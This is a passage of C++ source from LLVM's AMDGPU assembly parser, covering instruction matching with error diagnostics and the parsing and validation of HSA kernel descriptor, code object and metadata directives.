  return isSupportedMnemo(Mnemo, FBS, getAllVariants());
}
// A mnemonic is supported if any of the requested assembler variants
// accepts it under the given feature set.
bool AMDGPUAsmParser::isSupportedMnemo(StringRef Mnemo,
                                       const FeatureBitset &FBS,
                                       ArrayRef<unsigned> Variants) {
  for (unsigned Variant : Variants)
    if (AMDGPUCheckMnemonic(Mnemo, FBS, Variant))
      return true;
  return false;
}
// Diagnose a mnemonic that failed to match. Returns false when the mnemonic
// is actually supported (so the caller reports the original match failure),
// or true after emitting the most specific "unsupported" diagnostic.
bool AMDGPUAsmParser::checkUnsupportedInstruction(StringRef Mnemo,
                                                  const SMLoc &IDLoc) {
  FeatureBitset FBS = ComputeAvailableFeatures(getSTI().getFeatureBits());

  // Check if requested instruction variant is supported.
  if (isSupportedMnemo(Mnemo, FBS, getMatchedVariants()))
    return false;

  // This instruction is not supported.
  // Clear any other pending errors because they are no longer relevant.
  getParser().clearPendingErrors();

  // Requested instruction variant is not supported.
  // Check if any other variants are supported.
  StringRef VariantName = getMatchedVariantName();
  if (!VariantName.empty() && isSupportedMnemo(Mnemo, FBS)) {
    return Error(IDLoc,
                 Twine(VariantName,
                       " variant of this instruction is not supported"));
  }

  // Finally check if this instruction is supported on any other GPU.
  if (isSupportedMnemo(Mnemo, FeatureBitset().set())) {
    return Error(IDLoc, "instruction not supported on this GPU");
  }

  // Instruction not supported on any GPU. Probably a typo.
  std::string Suggestion = AMDGPUMnemonicSpellCheck(Mnemo, FBS);
  return Error(IDLoc, "invalid instruction" + Suggestion);
}
// Match the parsed operands against every applicable assembler variant,
// keeping the most specific failure status, then either validate and emit
// the matched instruction or report the best diagnostic. Returns true on
// error (matching the MCTargetAsmParser convention).
bool AMDGPUAsmParser::MatchAndEmitInstruction(SMLoc IDLoc, unsigned &Opcode,
                                              OperandVector &Operands,
                                              MCStreamer &Out,
                                              uint64_t &ErrorInfo,
                                              bool MatchingInlineAsm) {
  MCInst Inst;
  unsigned Result = Match_Success;
  for (auto Variant : getMatchedVariants()) {
    uint64_t EI;
    auto R = MatchInstructionImpl(Operands, Inst, EI, MatchingInlineAsm,
                                  Variant);
    // We order match statuses from least to most specific. We use most specific
    // status as resulting
    // Match_MnemonicFail < Match_InvalidOperand < Match_MissingFeature < Match_PreferE32
    if ((R == Match_Success) ||
        (R == Match_PreferE32) ||
        (R == Match_MissingFeature && Result != Match_PreferE32) ||
        (R == Match_InvalidOperand && Result != Match_MissingFeature
                                   && Result != Match_PreferE32) ||
        (R == Match_MnemonicFail   && Result != Match_InvalidOperand
                                   && Result != Match_MissingFeature
                                   && Result != Match_PreferE32)) {
      Result = R;
      ErrorInfo = EI;
    }
    if (R == Match_Success)
      break;
  }

  if (Result == Match_Success) {
    // A successful match still has to pass semantic validation.
    if (!validateInstruction(Inst, IDLoc, Operands)) {
      return true;
    }
    Inst.setLoc(IDLoc);
    Out.emitInstruction(Inst, getSTI());
    return false;
  }

  StringRef Mnemo = ((AMDGPUOperand &)*Operands[0]).getToken();
  if (checkUnsupportedInstruction(Mnemo, IDLoc)) {
    return true;
  }

  switch (Result) {
  default: break;
  case Match_MissingFeature:
    // It has been verified that the specified instruction
    // mnemonic is valid. A match was found but it requires
    // features which are not supported on this GPU.
    return Error(IDLoc, "operands are not valid for this GPU or mode");

  case Match_InvalidOperand: {
    SMLoc ErrorLoc = IDLoc;
    if (ErrorInfo != ~0ULL) {
      if (ErrorInfo >= Operands.size()) {
        return Error(IDLoc, "too few operands for instruction");
      }
      ErrorLoc = ((AMDGPUOperand &)*Operands[ErrorInfo]).getStartLoc();
      if (ErrorLoc == SMLoc())
        ErrorLoc = IDLoc;
    }
    return Error(ErrorLoc, "invalid operand for instruction");
  }

  case Match_PreferE32:
    return Error(IDLoc, "internal error: instruction without _e64 suffix "
                        "should be encoded as e32");

  case Match_MnemonicFail:
    llvm_unreachable("Invalid instructions should have been handled already");
  }
  llvm_unreachable("Implement any new match types added!");
}
// Parse an absolute expression and narrow the result to 32 bits.
// Returns true on failure; on success stores the truncated value in Ret.
bool AMDGPUAsmParser::ParseAsAbsoluteExpression(uint32_t &Ret) {
  // The expression must begin with an integer or an identifier.
  if (!isToken(AsmToken::Integer) && !isToken(AsmToken::Identifier))
    return true;

  int64_t Value = -1;
  if (getParser().parseAbsoluteExpression(Value))
    return true;

  Ret = static_cast<uint32_t>(Value);
  return false;
}
// Parse "<major>, <minor>" as used by version directives; emits a token
// error and returns true on malformed input.
bool AMDGPUAsmParser::ParseDirectiveMajorMinor(uint32_t &Major,
                                               uint32_t &Minor) {
  if (ParseAsAbsoluteExpression(Major))
    return TokError("invalid major version");

  if (!trySkipToken(AsmToken::Comma))
    return TokError("minor version number required, comma expected");

  if (ParseAsAbsoluteExpression(Minor))
    return TokError("invalid minor version");

  return false;
}
// Parse the .amdgcn_target directive and verify that the quoted target-id
// string matches the target id configured on the target streamer.
bool AMDGPUAsmParser::ParseDirectiveAMDGCNTarget() {
  if (getSTI().getTargetTriple().getArch() != Triple::amdgcn)
    return TokError("directive only supported for amdgcn architecture");

  std::string TargetIDDirective;
  SMLoc TargetStart = getTok().getLoc();
  if (getParser().parseEscapedString(TargetIDDirective))
    return true;

  SMRange TargetRange = SMRange(TargetStart, getTok().getLoc());
  if (getTargetStreamer().getTargetID()->toString() != TargetIDDirective)
    return getParser().Error(TargetRange.Start,
        (Twine(".amdgcn_target directive's target id ") +
         Twine(TargetIDDirective) +
         Twine(" does not match the specified target id ") +
         Twine(getTargetStreamer().getTargetID()->toString())).str());

  return false;
}
// Emit a generic "value out of range" diagnostic covering Range.
bool AMDGPUAsmParser::OutOfRangeError(SMRange Range) {
  return Error(Range.Start, "value out of range", Range);
}
// Translate next-free VGPR/SGPR counts from .amdhsa_ directives into the
// block-granule values stored in the kernel descriptor. Emits an
// out-of-range error against the supplied source ranges on overflow.
bool AMDGPUAsmParser::calculateGPRBlocks(
    const FeatureBitset &Features, bool VCCUsed, bool FlatScrUsed,
    bool XNACKUsed, Optional<bool> EnableWavefrontSize32, unsigned NextFreeVGPR,
    SMRange VGPRRange, unsigned NextFreeSGPR, SMRange SGPRRange,
    unsigned &VGPRBlocks, unsigned &SGPRBlocks) {
  // TODO(scott.linder): These calculations are duplicated from
  // AMDGPUAsmPrinter::getSIProgramInfo and could be unified.
  IsaVersion Version = getIsaVersion(getSTI().getCPU());

  unsigned NumVGPRs = NextFreeVGPR;
  unsigned NumSGPRs = NextFreeSGPR;

  if (Version.Major >= 10)
    // gfx10+ does not track an SGPR count here.
    NumSGPRs = 0;
  else {
    unsigned MaxAddressableNumSGPRs =
        IsaInfo::getAddressableNumSGPRs(&getSTI());

    if (Version.Major >= 8 && !Features.test(FeatureSGPRInitBug) &&
        NumSGPRs > MaxAddressableNumSGPRs)
      return OutOfRangeError(SGPRRange);

    // Account for the extra SGPRs consumed by VCC / flat scratch / XNACK.
    NumSGPRs +=
        IsaInfo::getNumExtraSGPRs(&getSTI(), VCCUsed, FlatScrUsed, XNACKUsed);

    if ((Version.Major <= 7 || Features.test(FeatureSGPRInitBug)) &&
        NumSGPRs > MaxAddressableNumSGPRs)
      return OutOfRangeError(SGPRRange);

    if (Features.test(FeatureSGPRInitBug))
      NumSGPRs = IsaInfo::FIXED_NUM_SGPRS_FOR_INIT_BUG;
  }

  VGPRBlocks =
      IsaInfo::getNumVGPRBlocks(&getSTI(), NumVGPRs, EnableWavefrontSize32);
  SGPRBlocks = IsaInfo::getNumSGPRBlocks(&getSTI(), NumSGPRs);

  return false;
}
bool AMDGPUAsmParser::ParseDirectiveAMDHSAKernel() {
if (getSTI().getTargetTriple().getArch() != Triple::amdgcn)
return TokError("directive only supported for amdgcn architecture");
if (getSTI().getTargetTriple().getOS() != Triple::AMDHSA)
return TokError("directive only supported for amdhsa OS");
StringRef KernelName;
if (getParser().parseIdentifier(KernelName))
return true;
kernel_descriptor_t KD = getDefaultAmdhsaKernelDescriptor(&getSTI());
StringSet<> Seen;
IsaVersion IVersion = getIsaVersion(getSTI().getCPU());
SMRange VGPRRange;
uint64_t NextFreeVGPR = 0;
uint64_t AccumOffset = 0;
SMRange SGPRRange;
uint64_t NextFreeSGPR = 0;
// Count the number of user SGPRs implied from the enabled feature bits.
unsigned ImpliedUserSGPRCount = 0;
// Track if the asm explicitly contains the directive for the user SGPR
// count.
Optional<unsigned> ExplicitUserSGPRCount;
bool ReserveVCC = true;
bool ReserveFlatScr = true;
Optional<bool> EnableWavefrontSize32;
while (true) {
while (trySkipToken(AsmToken::EndOfStatement));
StringRef ID;
SMRange IDRange = getTok().getLocRange();
if (!parseId(ID, "expected .amdhsa_ directive or .end_amdhsa_kernel"))
return true;
if (ID == ".end_amdhsa_kernel")
break;
if (Seen.find(ID) != Seen.end())
return TokError(".amdhsa_ directives cannot be repeated");
Seen.insert(ID);
SMLoc ValStart = getLoc();
int64_t IVal;
if (getParser().parseAbsoluteExpression(IVal))
return true;
SMLoc ValEnd = getLoc();
SMRange ValRange = SMRange(ValStart, ValEnd);
if (IVal < 0)
return OutOfRangeError(ValRange);
uint64_t Val = IVal;
#define PARSE_BITS_ENTRY(FIELD, ENTRY, VALUE, RANGE) \
if (!isUInt<ENTRY##_WIDTH>(VALUE)) \
return OutOfRangeError(RANGE); \
AMDHSA_BITS_SET(FIELD, ENTRY, VALUE);
if (ID == ".amdhsa_group_segment_fixed_size") {
if (!isUInt<sizeof(KD.group_segment_fixed_size) * CHAR_BIT>(Val))
return OutOfRangeError(ValRange);
KD.group_segment_fixed_size = Val;
} else if (ID == ".amdhsa_private_segment_fixed_size") {
if (!isUInt<sizeof(KD.private_segment_fixed_size) * CHAR_BIT>(Val))
return OutOfRangeError(ValRange);
KD.private_segment_fixed_size = Val;
} else if (ID == ".amdhsa_kernarg_size") {
if (!isUInt<sizeof(KD.kernarg_size) * CHAR_BIT>(Val))
return OutOfRangeError(ValRange);
KD.kernarg_size = Val;
} else if (ID == ".amdhsa_user_sgpr_count") {
ExplicitUserSGPRCount = Val;
} else if (ID == ".amdhsa_user_sgpr_private_segment_buffer") {
if (hasArchitectedFlatScratch())
return Error(IDRange.Start,
"directive is not supported with architected flat scratch",
IDRange);
PARSE_BITS_ENTRY(KD.kernel_code_properties,
KERNEL_CODE_PROPERTY_ENABLE_SGPR_PRIVATE_SEGMENT_BUFFER,
Val, ValRange);
if (Val)
ImpliedUserSGPRCount += 4;
} else if (ID == ".amdhsa_user_sgpr_dispatch_ptr") {
PARSE_BITS_ENTRY(KD.kernel_code_properties,
KERNEL_CODE_PROPERTY_ENABLE_SGPR_DISPATCH_PTR, Val,
ValRange);
if (Val)
ImpliedUserSGPRCount += 2;
} else if (ID == ".amdhsa_user_sgpr_queue_ptr") {
PARSE_BITS_ENTRY(KD.kernel_code_properties,
KERNEL_CODE_PROPERTY_ENABLE_SGPR_QUEUE_PTR, Val,
ValRange);
if (Val)
ImpliedUserSGPRCount += 2;
} else if (ID == ".amdhsa_user_sgpr_kernarg_segment_ptr") {
PARSE_BITS_ENTRY(KD.kernel_code_properties,
KERNEL_CODE_PROPERTY_ENABLE_SGPR_KERNARG_SEGMENT_PTR,
Val, ValRange);
if (Val)
ImpliedUserSGPRCount += 2;
} else if (ID == ".amdhsa_user_sgpr_dispatch_id") {
PARSE_BITS_ENTRY(KD.kernel_code_properties,
KERNEL_CODE_PROPERTY_ENABLE_SGPR_DISPATCH_ID, Val,
ValRange);
if (Val)
ImpliedUserSGPRCount += 2;
} else if (ID == ".amdhsa_user_sgpr_flat_scratch_init") {
if (hasArchitectedFlatScratch())
return Error(IDRange.Start,
"directive is not supported with architected flat scratch",
IDRange);
PARSE_BITS_ENTRY(KD.kernel_code_properties,
KERNEL_CODE_PROPERTY_ENABLE_SGPR_FLAT_SCRATCH_INIT, Val,
ValRange);
if (Val)
ImpliedUserSGPRCount += 2;
} else if (ID == ".amdhsa_user_sgpr_private_segment_size") {
PARSE_BITS_ENTRY(KD.kernel_code_properties,
KERNEL_CODE_PROPERTY_ENABLE_SGPR_PRIVATE_SEGMENT_SIZE,
Val, ValRange);
if (Val)
ImpliedUserSGPRCount += 1;
} else if (ID == ".amdhsa_wavefront_size32") {
if (IVersion.Major < 10)
return Error(IDRange.Start, "directive requires gfx10+", IDRange);
EnableWavefrontSize32 = Val;
PARSE_BITS_ENTRY(KD.kernel_code_properties,
KERNEL_CODE_PROPERTY_ENABLE_WAVEFRONT_SIZE32,
Val, ValRange);
} else if (ID == ".amdhsa_system_sgpr_private_segment_wavefront_offset") {
if (hasArchitectedFlatScratch())
return Error(IDRange.Start,
"directive is not supported with architected flat scratch",
IDRange);
PARSE_BITS_ENTRY(KD.compute_pgm_rsrc2,
COMPUTE_PGM_RSRC2_ENABLE_PRIVATE_SEGMENT, Val, ValRange);
} else if (ID == ".amdhsa_enable_private_segment") {
if (!hasArchitectedFlatScratch())
return Error(
IDRange.Start,
"directive is not supported without architected flat scratch",
IDRange);
PARSE_BITS_ENTRY(KD.compute_pgm_rsrc2,
COMPUTE_PGM_RSRC2_ENABLE_PRIVATE_SEGMENT, Val, ValRange);
} else if (ID == ".amdhsa_system_sgpr_workgroup_id_x") {
PARSE_BITS_ENTRY(KD.compute_pgm_rsrc2,
COMPUTE_PGM_RSRC2_ENABLE_SGPR_WORKGROUP_ID_X, Val,
ValRange);
} else if (ID == ".amdhsa_system_sgpr_workgroup_id_y") {
PARSE_BITS_ENTRY(KD.compute_pgm_rsrc2,
COMPUTE_PGM_RSRC2_ENABLE_SGPR_WORKGROUP_ID_Y, Val,
ValRange);
} else if (ID == ".amdhsa_system_sgpr_workgroup_id_z") {
PARSE_BITS_ENTRY(KD.compute_pgm_rsrc2,
COMPUTE_PGM_RSRC2_ENABLE_SGPR_WORKGROUP_ID_Z, Val,
ValRange);
} else if (ID == ".amdhsa_system_sgpr_workgroup_info") {
PARSE_BITS_ENTRY(KD.compute_pgm_rsrc2,
COMPUTE_PGM_RSRC2_ENABLE_SGPR_WORKGROUP_INFO, Val,
ValRange);
} else if (ID == ".amdhsa_system_vgpr_workitem_id") {
PARSE_BITS_ENTRY(KD.compute_pgm_rsrc2,
COMPUTE_PGM_RSRC2_ENABLE_VGPR_WORKITEM_ID, Val,
ValRange);
} else if (ID == ".amdhsa_next_free_vgpr") {
VGPRRange = ValRange;
NextFreeVGPR = Val;
} else if (ID == ".amdhsa_next_free_sgpr") {
SGPRRange = ValRange;
NextFreeSGPR = Val;
} else if (ID == ".amdhsa_accum_offset") {
if (!isGFX90A())
return Error(IDRange.Start, "directive requires gfx90a+", IDRange);
AccumOffset = Val;
} else if (ID == ".amdhsa_reserve_vcc") {
if (!isUInt<1>(Val))
return OutOfRangeError(ValRange);
ReserveVCC = Val;
} else if (ID == ".amdhsa_reserve_flat_scratch") {
if (IVersion.Major < 7)
return Error(IDRange.Start, "directive requires gfx7+", IDRange);
if (hasArchitectedFlatScratch())
return Error(IDRange.Start,
"directive is not supported with architected flat scratch",
IDRange);
if (!isUInt<1>(Val))
return OutOfRangeError(ValRange);
ReserveFlatScr = Val;
} else if (ID == ".amdhsa_reserve_xnack_mask") {
if (IVersion.Major < 8)
return Error(IDRange.Start, "directive requires gfx8+", IDRange);
if (!isUInt<1>(Val))
return OutOfRangeError(ValRange);
if (Val != getTargetStreamer().getTargetID()->isXnackOnOrAny())
return getParser().Error(IDRange.Start, ".amdhsa_reserve_xnack_mask does not match target id",
IDRange);
} else if (ID == ".amdhsa_float_round_mode_32") {
PARSE_BITS_ENTRY(KD.compute_pgm_rsrc1,
COMPUTE_PGM_RSRC1_FLOAT_ROUND_MODE_32, Val, ValRange);
} else if (ID == ".amdhsa_float_round_mode_16_64") {
PARSE_BITS_ENTRY(KD.compute_pgm_rsrc1,
COMPUTE_PGM_RSRC1_FLOAT_ROUND_MODE_16_64, Val, ValRange);
} else if (ID == ".amdhsa_float_denorm_mode_32") {
PARSE_BITS_ENTRY(KD.compute_pgm_rsrc1,
COMPUTE_PGM_RSRC1_FLOAT_DENORM_MODE_32, Val, ValRange);
} else if (ID == ".amdhsa_float_denorm_mode_16_64") {
PARSE_BITS_ENTRY(KD.compute_pgm_rsrc1,
COMPUTE_PGM_RSRC1_FLOAT_DENORM_MODE_16_64, Val,
ValRange);
} else if (ID == ".amdhsa_dx10_clamp") {
PARSE_BITS_ENTRY(KD.compute_pgm_rsrc1,
COMPUTE_PGM_RSRC1_ENABLE_DX10_CLAMP, Val, ValRange);
} else if (ID == ".amdhsa_ieee_mode") {
PARSE_BITS_ENTRY(KD.compute_pgm_rsrc1, COMPUTE_PGM_RSRC1_ENABLE_IEEE_MODE,
Val, ValRange);
} else if (ID == ".amdhsa_fp16_overflow") {
if (IVersion.Major < 9)
return Error(IDRange.Start, "directive requires gfx9+", IDRange);
PARSE_BITS_ENTRY(KD.compute_pgm_rsrc1, COMPUTE_PGM_RSRC1_FP16_OVFL, Val,
ValRange);
} else if (ID == ".amdhsa_tg_split") {
if (!isGFX90A())
return Error(IDRange.Start, "directive requires gfx90a+", IDRange);
PARSE_BITS_ENTRY(KD.compute_pgm_rsrc3, COMPUTE_PGM_RSRC3_GFX90A_TG_SPLIT, Val,
ValRange);
} else if (ID == ".amdhsa_workgroup_processor_mode") {
if (IVersion.Major < 10)
return Error(IDRange.Start, "directive requires gfx10+", IDRange);
PARSE_BITS_ENTRY(KD.compute_pgm_rsrc1, COMPUTE_PGM_RSRC1_WGP_MODE, Val,
ValRange);
} else if (ID == ".amdhsa_memory_ordered") {
if (IVersion.Major < 10)
return Error(IDRange.Start, "directive requires gfx10+", IDRange);
PARSE_BITS_ENTRY(KD.compute_pgm_rsrc1, COMPUTE_PGM_RSRC1_MEM_ORDERED, Val,
ValRange);
} else if (ID == ".amdhsa_forward_progress") {
if (IVersion.Major < 10)
return Error(IDRange.Start, "directive requires gfx10+", IDRange);
PARSE_BITS_ENTRY(KD.compute_pgm_rsrc1, COMPUTE_PGM_RSRC1_FWD_PROGRESS, Val,
ValRange);
} else if (ID == ".amdhsa_exception_fp_ieee_invalid_op") {
PARSE_BITS_ENTRY(
KD.compute_pgm_rsrc2,
COMPUTE_PGM_RSRC2_ENABLE_EXCEPTION_IEEE_754_FP_INVALID_OPERATION, Val,
ValRange);
} else if (ID == ".amdhsa_exception_fp_denorm_src") {
PARSE_BITS_ENTRY(KD.compute_pgm_rsrc2,
COMPUTE_PGM_RSRC2_ENABLE_EXCEPTION_FP_DENORMAL_SOURCE,
Val, ValRange);
} else if (ID == ".amdhsa_exception_fp_ieee_div_zero") {
PARSE_BITS_ENTRY(
KD.compute_pgm_rsrc2,
COMPUTE_PGM_RSRC2_ENABLE_EXCEPTION_IEEE_754_FP_DIVISION_BY_ZERO, Val,
ValRange);
} else if (ID == ".amdhsa_exception_fp_ieee_overflow") {
PARSE_BITS_ENTRY(KD.compute_pgm_rsrc2,
COMPUTE_PGM_RSRC2_ENABLE_EXCEPTION_IEEE_754_FP_OVERFLOW,
Val, ValRange);
} else if (ID == ".amdhsa_exception_fp_ieee_underflow") {
PARSE_BITS_ENTRY(KD.compute_pgm_rsrc2,
COMPUTE_PGM_RSRC2_ENABLE_EXCEPTION_IEEE_754_FP_UNDERFLOW,
Val, ValRange);
} else if (ID == ".amdhsa_exception_fp_ieee_inexact") {
PARSE_BITS_ENTRY(KD.compute_pgm_rsrc2,
COMPUTE_PGM_RSRC2_ENABLE_EXCEPTION_IEEE_754_FP_INEXACT,
Val, ValRange);
} else if (ID == ".amdhsa_exception_int_div_zero") {
PARSE_BITS_ENTRY(KD.compute_pgm_rsrc2,
COMPUTE_PGM_RSRC2_ENABLE_EXCEPTION_INT_DIVIDE_BY_ZERO,
Val, ValRange);
} else {
return Error(IDRange.Start, "unknown .amdhsa_kernel directive", IDRange);
}
#undef PARSE_BITS_ENTRY
}
if (Seen.find(".amdhsa_next_free_vgpr") == Seen.end())
return TokError(".amdhsa_next_free_vgpr directive is required");
if (Seen.find(".amdhsa_next_free_sgpr") == Seen.end())
return TokError(".amdhsa_next_free_sgpr directive is required");
unsigned VGPRBlocks;
unsigned SGPRBlocks;
if (calculateGPRBlocks(getFeatureBits(), ReserveVCC, ReserveFlatScr,
getTargetStreamer().getTargetID()->isXnackOnOrAny(),
EnableWavefrontSize32, NextFreeVGPR,
VGPRRange, NextFreeSGPR, SGPRRange, VGPRBlocks,
SGPRBlocks))
return true;
if (!isUInt<COMPUTE_PGM_RSRC1_GRANULATED_WORKITEM_VGPR_COUNT_WIDTH>(
VGPRBlocks))
return OutOfRangeError(VGPRRange);
AMDHSA_BITS_SET(KD.compute_pgm_rsrc1,
COMPUTE_PGM_RSRC1_GRANULATED_WORKITEM_VGPR_COUNT, VGPRBlocks);
if (!isUInt<COMPUTE_PGM_RSRC1_GRANULATED_WAVEFRONT_SGPR_COUNT_WIDTH>(
SGPRBlocks))
return OutOfRangeError(SGPRRange);
AMDHSA_BITS_SET(KD.compute_pgm_rsrc1,
COMPUTE_PGM_RSRC1_GRANULATED_WAVEFRONT_SGPR_COUNT,
SGPRBlocks);
if (ExplicitUserSGPRCount && ImpliedUserSGPRCount > *ExplicitUserSGPRCount)
return TokError("amdgpu_user_sgpr_count smaller than than implied by "
"enabled user SGPRs");
unsigned UserSGPRCount =
ExplicitUserSGPRCount ? *ExplicitUserSGPRCount : ImpliedUserSGPRCount;
if (!isUInt<COMPUTE_PGM_RSRC2_USER_SGPR_COUNT_WIDTH>(UserSGPRCount))
return TokError("too many user SGPRs enabled");
AMDHSA_BITS_SET(KD.compute_pgm_rsrc2, COMPUTE_PGM_RSRC2_USER_SGPR_COUNT,
UserSGPRCount);
if (isGFX90A()) {
if (Seen.find(".amdhsa_accum_offset") == Seen.end())
return TokError(".amdhsa_accum_offset directive is required");
if (AccumOffset < 4 || AccumOffset > 256 || (AccumOffset & 3))
return TokError("accum_offset should be in range [4..256] in "
"increments of 4");
if (AccumOffset > alignTo(std::max((uint64_t)1, NextFreeVGPR), 4))
return TokError("accum_offset exceeds total VGPR allocation");
AMDHSA_BITS_SET(KD.compute_pgm_rsrc3, COMPUTE_PGM_RSRC3_GFX90A_ACCUM_OFFSET,
(AccumOffset / 4 - 1));
}
getTargetStreamer().EmitAmdhsaKernelDescriptor(
getSTI(), KernelName, KD, NextFreeVGPR, NextFreeSGPR, ReserveVCC,
ReserveFlatScr);
return false;
}
/// Handle the .hsa_code_object_version directive: parse "major, minor" and
/// forward the pair to the target streamer. Returns true on error.
bool AMDGPUAsmParser::ParseDirectiveHSACodeObjectVersion() {
  uint32_t VersionMajor;
  uint32_t VersionMinor;

  if (ParseDirectiveMajorMinor(VersionMajor, VersionMinor))
    return true;

  getTargetStreamer().EmitDirectiveHSACodeObjectVersion(VersionMajor,
                                                        VersionMinor);
  return false;
}
/// Parse the .hsa_code_object_isa directive. Two forms are accepted:
///   .hsa_code_object_isa
///     (no arguments -- emit the ISA version of the targeted GPU)
///   .hsa_code_object_isa major, minor, stepping, "vendor", "arch"
/// Returns true on error.
bool AMDGPUAsmParser::ParseDirectiveHSACodeObjectISA() {
  uint32_t Major;
  uint32_t Minor;
  uint32_t Stepping;
  StringRef VendorName;
  StringRef ArchName;

  // If this directive has no arguments, then use the ISA version for the
  // targeted GPU.
  if (isToken(AsmToken::EndOfStatement)) {
    AMDGPU::IsaVersion ISA = AMDGPU::getIsaVersion(getSTI().getCPU());
    getTargetStreamer().EmitDirectiveHSACodeObjectISAV2(ISA.Major, ISA.Minor,
                                                        ISA.Stepping,
                                                        "AMD", "AMDGPU");
    return false;
  }

  if (ParseDirectiveMajorMinor(Major, Minor))
    return true;

  if (!trySkipToken(AsmToken::Comma))
    return TokError("stepping version number required, comma expected");

  if (ParseAsAbsoluteExpression(Stepping))
    return TokError("invalid stepping version");

  if (!trySkipToken(AsmToken::Comma))
    return TokError("vendor name required, comma expected");

  if (!parseString(VendorName, "invalid vendor name"))
    return true;

  if (!trySkipToken(AsmToken::Comma))
    return TokError("arch name required, comma expected");

  if (!parseString(ArchName, "invalid arch name"))
    return true;

  getTargetStreamer().EmitDirectiveHSACodeObjectISAV2(Major, Minor, Stepping,
                                                      VendorName, ArchName);
  return false;
}
/// Parse and validate one "key = value" entry of an .amd_kernel_code_t
/// block into Header. Returns true on error.
///
/// After the generic field parse, a few fields get extra validation against
/// the subtarget feature bits (wavefront size and GFX10-only control bits).
bool AMDGPUAsmParser::ParseAMDKernelCodeTValue(StringRef ID,
                                               amd_kernel_code_t &Header) {
  // max_scratch_backing_memory_byte_size is deprecated. Ignore it while parsing
  // assembly for backwards compatibility.
  if (ID == "max_scratch_backing_memory_byte_size") {
    Parser.eatToEndOfStatement();
    return false;
  }

  SmallString<40> ErrStr;
  raw_svector_ostream Err(ErrStr);
  if (!parseAmdKernelCodeField(ID, getParser(), Header, Err)) {
    return TokError(Err.str());
  }
  Lex();

  if (ID == "enable_wavefront_size32") {
    if (Header.code_properties & AMD_CODE_PROPERTY_ENABLE_WAVEFRONT_SIZE32) {
      if (!isGFX10Plus())
        return TokError("enable_wavefront_size32=1 is only allowed on GFX10+");
      if (!getFeatureBits()[AMDGPU::FeatureWavefrontSize32])
        return TokError("enable_wavefront_size32=1 requires +WavefrontSize32");
    } else {
      if (!getFeatureBits()[AMDGPU::FeatureWavefrontSize64])
        return TokError("enable_wavefront_size32=0 requires +WavefrontSize64");
    }
  }

  if (ID == "wavefront_size") {
    // wavefront_size appears to be a log2 value: 5 -> wave32, 6 -> wave64
    // (consistent with the feature checks below) -- confirm against the
    // amd_kernel_code_t spec.
    if (Header.wavefront_size == 5) {
      if (!isGFX10Plus())
        return TokError("wavefront_size=5 is only allowed on GFX10+");
      if (!getFeatureBits()[AMDGPU::FeatureWavefrontSize32])
        return TokError("wavefront_size=5 requires +WavefrontSize32");
    } else if (Header.wavefront_size == 6) {
      if (!getFeatureBits()[AMDGPU::FeatureWavefrontSize64])
        return TokError("wavefront_size=6 requires +WavefrontSize64");
    }
  }

  if (ID == "enable_wgp_mode") {
    if (G_00B848_WGP_MODE(Header.compute_pgm_resource_registers) &&
        !isGFX10Plus())
      return TokError("enable_wgp_mode=1 is only allowed on GFX10+");
  }

  if (ID == "enable_mem_ordered") {
    if (G_00B848_MEM_ORDERED(Header.compute_pgm_resource_registers) &&
        !isGFX10Plus())
      return TokError("enable_mem_ordered=1 is only allowed on GFX10+");
  }

  if (ID == "enable_fwd_progress") {
    if (G_00B848_FWD_PROGRESS(Header.compute_pgm_resource_registers) &&
        !isGFX10Plus())
      return TokError("enable_fwd_progress=1 is only allowed on GFX10+");
  }

  return false;
}
bool AMDGPUAsmParser::ParseDirectiveAMDKernelCodeT() {
amd_kernel_code_t Header;
AMDGPU::initDefaultAMDKernelCodeT(Header, &getSTI());
while (true) {
// Lex EndOfStatement. This is in a while loop, because lexing a comment
// will set the current token to EndOfStatement.
while(trySkipToken(AsmToken::EndOfStatement));
StringRef ID;
if (!parseId(ID, "expected value identifier or .end_amd_kernel_code_t"))
return true;
if (ID == ".end_amd_kernel_code_t")
break;
if (ParseAMDKernelCodeTValue(ID, Header))
return true;
}
getTargetStreamer().EmitAMDKernelCodeT(Header);
return false;
}
bool AMDGPUAsmParser::ParseDirectiveAMDGPUHsaKernel() {
StringRef KernelName;
if (!parseId(KernelName, "expected symbol name"))
return true;
getTargetStreamer().EmitAMDGPUSymbolType(KernelName,
ELF::STT_AMDGPU_HSA_KERNEL);
KernelScope.initialize(getContext());
return false;
}
/// Parse '.amd_amdgpu_isa "<target-id>"'. Only valid for amdgcn triples;
/// the quoted target id must match the one derived from subtarget options.
bool AMDGPUAsmParser::ParseDirectiveISAVersion() {
  if (getSTI().getTargetTriple().getArch() != Triple::amdgcn) {
    return Error(getLoc(),
                 ".amd_amdgpu_isa directive is not available on non-amdgcn "
                 "architectures");
  }

  // NOTE(review): this reads the current token's string contents directly,
  // assuming the token is a string literal -- verify behavior on malformed
  // (non-string) input.
  auto TargetIDDirective = getLexer().getTok().getStringContents();
  if (getTargetStreamer().getTargetID()->toString() != TargetIDDirective)
    return Error(getParser().getTok().getLoc(), "target id must match options");

  getTargetStreamer().EmitISAVersion();
  // Consume the string token only after the comparison above used it.
  Lex();

  return false;
}
/// Parse the HSA metadata block between the begin/end assembler directives
/// (the V3+ or V2 directive pair, chosen by ABI version) and emit it via
/// the target streamer. Only valid on amdhsa OSes. Returns true on error.
bool AMDGPUAsmParser::ParseDirectiveHSAMetadata() {
  const char *AssemblerDirectiveBegin;
  const char *AssemblerDirectiveEnd;
  // Select the directive pair matching the HSA ABI version.
  std::tie(AssemblerDirectiveBegin, AssemblerDirectiveEnd) =
      isHsaAbiVersion3AndAbove(&getSTI())
          ? std::make_tuple(HSAMD::V3::AssemblerDirectiveBegin,
                            HSAMD::V3::AssemblerDirectiveEnd)
          : std::make_tuple(HSAMD::AssemblerDirectiveBegin,
                            HSAMD::AssemblerDirectiveEnd);

  if (getSTI().getTargetTriple().getOS() != Triple::AMDHSA) {
    return Error(getLoc(),
                 (Twine(AssemblerDirectiveBegin) + Twine(" directive is "
                 "not available on non-amdhsa OSes")).str());
  }

  std::string HSAMetadataString;
  if (ParseToEndDirective(AssemblerDirectiveBegin, AssemblerDirectiveEnd,
                          HSAMetadataString))
    return true;

  // Validation and emission are version-specific.
  if (isHsaAbiVersion3AndAbove(&getSTI())) {
    if (!getTargetStreamer().EmitHSAMetadataV3(HSAMetadataString))
      return Error(getLoc(), "invalid HSA metadata");
  } else {
    if (!getTargetStreamer().EmitHSAMetadataV2(HSAMetadataString))
      return Error(getLoc(), "invalid HSA metadata");
  }

  return false;
}
/// Common code to parse out a block of text (typically YAML) between start and
/// end directives.
/// The collected text, with whitespace preserved and statements joined by
/// the target's separator string, is returned in CollectString. Returns
